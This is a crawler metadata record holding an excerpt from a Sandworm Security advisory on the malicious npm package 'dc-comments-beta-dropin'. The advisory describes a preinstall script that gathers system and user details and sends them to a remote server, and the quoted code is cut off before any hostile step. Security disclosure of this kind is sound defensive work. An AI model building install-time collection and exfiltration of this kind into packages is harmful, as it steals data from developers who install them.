id
type
0 (not classified)
status
21 (imported old-v2, waiting for another import)
review version
0
cleanup version
0
pending deletion
0 (-)
created at
2025-11-08 19:06:04
updated at
2025-11-08 19:06:05
url
https://sandworm.dev/npm/security-vulnerabilities/package/dc-comments-beta-dropin/
url length
82
url crc
40260
url crc32
1770560836
location type
1 (url matches target location, page_location is empty)
canonical status
2 (missing canonical tag in html)
canonical page id
-
domain id
domain tld
2265
domain parts
0
originating warc id
-
originating url
https://data.commoncrawl.org/crawl-data/CC-MAIN-2025-33/segments/1754151280076.69/warc/CC-MAIN-20250809045158-20250809075158-00615.warc.gz
source type
11 (CommonCrawl)
server ip
Publication date
2025-08-09 06:26:59
Fetch attempts
0
Original html size
32710
Normalized and saved size
32375
title
Latest Npm Package Security Vulnerabilities | Sandworm Security
excerpt
content
Sandworm scans all new Npm package versions for malicious install scripts. Scanning since October 2024.
Package: dc-comments-beta-dropin
⚠️ Found 4 vulnerable versions for package dc-comments-beta-dropin: 2.25.0, 3.44.0, 3.60.0, 2.385.0
Detected Date: 2 Apr 2025
Affected Install Script: preinstall
Package Source: ↗️ View on Npm
The code collects sensitive system information, including the user's hostname, operating system details, local IP address, username, and current working directory, and then sends this data to a specified remote server through both HTTP GET and POST requests. Additionally, it falls back to sending data via WebSocket if the HTTP requests fail. This can potentially lead to unauthorized access to sensitive information and facilitate malicious activity.
Install script: node index.js
Install script code:
const os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall =...
author
updated
1767787864
block type
0
extracted fields
105
extracted bits
featured image
title
full content
content was extracted heuristically
detected location
0
detected language
1 (English)
category id
Other [en] (231)
index version
2025123101
paywall score
0
spam phrases
0
text nonlatin
0
text cyrillic
0
text characters
9997
text words
1746
text unique words
272
text lines
1
text sentences
8
text paragraphs
1
text words per sentence
218
text matched phrases
8
text matched dictionaries
3
links self subdomains
0
links other subdomains
11
links other domains
7
links spam adult
0
links spam random
0
links spam expired
0
links ext activities
0
links ext ecommerce
0
links ext finance
0
links ext crypto
0
links ext booking
0
links ext news
0
links ext leaks
0
links ext ugc
9
links ext klim
0
links ext generic
0
image author
featured image